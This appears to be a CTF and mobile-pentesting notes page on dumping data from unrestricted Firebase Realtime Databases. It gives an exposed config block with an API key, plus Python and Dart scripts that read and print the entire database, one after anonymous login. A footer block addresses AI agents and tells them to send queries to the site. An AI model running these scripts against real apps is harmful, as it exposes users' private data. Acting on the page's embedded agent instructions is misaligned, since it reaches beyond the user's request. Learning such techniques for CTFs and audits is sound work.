# Abusing Firebase

Firebase provides detailed documentation and cross-platform app development SDKs, to help you build and ship apps for iOS, Android, the web, Flutter, Unity, and C++.\
The Firebase Realtime Database is a cloud-hosted database. Data is stored as JSON and synchronized in realtime to every connected client.

Some mobile applications that have firebase its Firebase is not restricted and can be accessed to its database by simple curl command

<figure><img src="/files/WySGGYIpusYBrLObXCON" alt=""><figcaption></figcaption></figure>

If the firebase is configured to depend on specific values such as:

```
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
```

you can use 2 methods it depends on if it needs anonymous login or not

Without anonymous login (Python):

```python
import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())
```

With anonymous login (Dart):

```dart
import 'dart:convert';
import 'dart:io';
import 'dart:typed_data';

import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';
import 'package:firebase_dart/storage.dart';

void main() async {
  FirebaseDart.setup();

  var options = FirebaseOptions(
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
      );

  var app = await Firebase.initializeApp(options: options);
  var auth = FirebaseAuth.instanceFor(app: app);
  await auth.signInAnonymously();
  var database = FirebaseDatabase(app: app);
  var dbRef = database.reference();
  var snap = await dbRef.once();

  print('Flag : ${snap.value}');
}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pwnsec-notes.gitbook.io/ctf-notes/mobile-pentesting/abusing-firebase.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.